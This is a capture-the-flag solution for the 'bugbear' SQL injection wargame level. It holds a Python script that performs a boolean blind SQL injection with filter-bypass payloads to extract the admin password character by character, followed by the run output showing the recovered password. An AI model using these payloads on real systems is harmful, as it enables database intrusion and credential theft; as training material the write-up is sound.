bugbear
Script
bugbear_script.py
import requests
import urllib.parse
import string
cookies = {'PHPSESSID': '8gn319vvgv2jjh50m0bg9c11ng'}
url = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'
password_length = 0
for x in range(0, 10):
payload = f"0||id IN(\"admin\")&&length(pw) IN({x})"
encoded_payload = urllib.parse.quote_plus(payload)
full_url = f"{url}?no={encoded_payload}"
response = requests.get(full_url, cookies=cookies)
if "Hello admin" in response.text:
password_length = x
break
print()
print(f'[!] Payload: ?no={payload}')
print(f'[!] Payload (URL encoded): ?no={encoded_payload}')
print(f'[!] Password length: {password_length}')
password = ''
searchspace = string.digits + string.ascii_letters
for index in range(1, password_length + 1):
for char in searchspace:
payload = f"0||id IN(\"admin\")&&mid(pw,{index},1) IN(\"{char}\")"
encoded_payload = urllib.parse.quote_plus(payload)
full_url = f'{url}?no={encoded_payload}'
response = requests.get(full_url, cookies=cookies)
if 'Hello admin' in response.text:
password += char
print()
print(f'[+] Payload: ?no={payload}')
print(f'[+] Payload (URL encoded): ?no={encoded_payload}')
print(f'[+] Character at index {index}: {char}')
break
print()
print(f'[!] Extracted password: {password}')
print(f'[!] Final payload: ?pw={password}')
$ python .\bugbear_script.py
[!] Payload: ?no=0||id IN("admin")&&length(pw) IN(8)
[!] Payload (URL encoded): ?no=0%7C%7Cid%09IN%28%22admin%22%29%26%26length%28pw%29%09IN%288%29
[!] Password length: 8
[+] Payload: ?no=0||id IN("admin")&&mid(pw,1,1) IN("5")
[+] Payload (URL encoded): ?no=0%7C%7Cid%09IN%28%22admin%22%29%26%26mid%28pw%2C1%2C1%29%09IN%28%225%22%29
[+] Character at index 1: 5
[+] Payload: ?no=0||id IN("admin")&&mid(pw,2,1) IN("2")
[+] Payload (URL encoded): ?no=0%7C%7Cid%09IN%28%22admin%22%29%26%26mid%28pw%2C2%2C1%29%09IN%28%222%22%29
[+] Character at index 2: 2
[+] Payload: ?no=0||id IN("admin")&&mid(pw,3,1) IN("d")
[+] Payload (URL encoded): ?no=0%7C%7Cid%09IN%28%22admin%22%29%26%26mid%28pw%2C3%2C1%29%09IN%28%22d%22%29
[+] Character at index 3: d
[+] Payload: ?no=0||id IN("admin")&&mid(pw,4,1) IN("c")
[+] Payload (URL encoded): ?no=0%7C%7Cid%09IN%28%22admin%22%29%26%26mid%28pw%2C4%2C1%29%09IN%28%22c%22%29
[+] Character at index 4: c
[+] Payload: ?no=0||id IN("admin")&&mid(pw,5,1) IN("3")
[+] Payload (URL encoded): ?no=0%7C%7Cid%09IN%28%22admin%22%29%26%26mid%28pw%2C5%2C1%29%09IN%28%223%22%29
[+] Character at index 5: 3
[+] Payload: ?no=0||id IN("admin")&&mid(pw,6,1) IN("9")
[+] Payload (URL encoded): ?no=0%7C%7Cid%09IN%28%22admin%22%29%26%26mid%28pw%2C6%2C1%29%09IN%28%229%22%29
[+] Character at index 6: 9
[+] Payload: ?no=0||id IN("admin")&&mid(pw,7,1) IN("9")
[+] Payload (URL encoded): ?no=0%7C%7Cid%09IN%28%22admin%22%29%26%26mid%28pw%2C7%2C1%29%09IN%28%229%22%29
[+] Character at index 7: 9
[+] Payload: ?no=0||id IN("admin")&&mid(pw,8,1) IN("1")
[+] Payload (URL encoded): ?no=0%7C%7Cid%09IN%28%22admin%22%29%26%26mid%28pw%2C8%2C1%29%09IN%28%221%22%29
[+] Character at index 8: 1
[!] Extracted password: 52dc3991
[!] Final payload: ?pw=52dc3991